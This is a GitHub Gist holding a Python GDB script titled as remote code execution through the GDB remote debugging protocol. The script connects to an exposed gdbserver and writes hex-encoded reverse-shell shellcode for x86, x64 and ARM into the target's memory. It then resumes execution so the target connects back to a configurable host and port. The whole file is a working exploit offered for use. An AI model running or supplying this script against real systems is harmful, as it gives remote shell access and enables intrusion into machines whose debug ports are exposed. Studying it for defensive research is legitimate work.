Created
August 31, 2015 15:09
-
-
Save orangetw/45d1d991a776e4f89d3f to your computer and use it in GitHub Desktop.
Remote Code Execution on GDB Remote Debugging Protocol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding: UTF-8 | |
| # | |
| import sys | |
| import gdb | |
| import socket | |
| import struct | |
| import binascii | |
| DEBUG = False | |
| GDB_SERVER = ('127.0.0.1', 12345) | |
| CONNECT_BACK_HOST = '127.0.0.1' | |
| CONNECT_BACK_PORT = 31337 | |
| def _set_pair(sc): | |
| ip = socket.inet_aton( CONNECT_BACK_HOST ) | |
| port = struct.pack('>H', CONNECT_BACK_PORT ) | |
| return binascii.unhexlify(sc).replace(b'\xff'*2, port).replace(b'\x00'*4, ip) | |
| def reverse_shell_x86(): | |
| sc = '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \ | |
| '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \ | |
| 'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80' | |
| return _set_pair(sc) | |
| def reverse_shell_x64(): | |
| sc = '4831c04831ff4831f64831d24d31c06a025f6a015e6a065a6a29580f054989c0' \ | |
| '4831f64d31d24152c604240266c7442402ffffc7442404000000004889e66a10' \ | |
| '5a41505f6a2a580f054831f66a035e48ffce6a21580f0575f64831ff57575e5a' \ | |
| '48bf2f2f62696e2f736848c1ef0857545f6a3b580f05' | |
| return _set_pair(sc) | |
| def reverse_shell_arm(): | |
| sc = '01108fe211ff2fe102200121921a0f02193701df061c08a11022023701df3f27' \ | |
| '0221301c01df0139fbd505a0921a05b469460b2701dfc0460200ffff00000000' \ | |
| '2f62696e2f736800' | |
| return _set_pair(sc) | |
| def gdb_exec(cmd): | |
| if DEBUG: | |
| gdb.execute( cmd ) | |
| else: | |
| gdb.execute( cmd, True, True ) | |
| if __name__ == '__main__': | |
| gdb_exec('set confirm off') | |
| gdb_exec('set verbose off') | |
| ARCHS = { | |
| 'x86': reverse_shell_x86(), | |
| 'x64': reverse_shell_x64(), | |
| 'arm': reverse_shell_arm() | |
| } | |
| for arch, shellcode in ARCHS.items(): | |
| try: | |
| if arch == 'arm': | |
| gdb_exec('set architecture arm') | |
| if arch == 'x86': | |
| gdb_exec('set architecture i386') | |
| if arch == 'x64': | |
| gdb_exec('set architecture i386:x86-64') | |
| gdb_exec('target extended-remote %s:%d' % GDB_SERVER) | |
| bp = gdb.Breakpoint('*0', internal=True) | |
| try: | |
| gdb_exec('run') | |
| except gdb.error as e: | |
| pass | |
| bp.delete() | |
| for idx, ch in enumerate(shellcode): | |
| ch = ord(ch) | |
| if arch == 'arm': | |
| gdb_exec('set *(unsigned char *)($pc + %d) = %d' % (idx, ch)) | |
| if arch == 'x86': | |
| gdb_exec('set *(unsigned char *)($eip + %d) = %d' % (idx, ch)) | |
| if arch == 'x64': | |
| gdb_exec('set *(unsigned char *)($rip + %d) = %d' % (idx, ch)) | |
| gdb_exec('continue') | |
| gdb_exec('continue') | |
| exit() | |
| except gdb.error as e: | |
| print( '##### not %s' % arch ) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment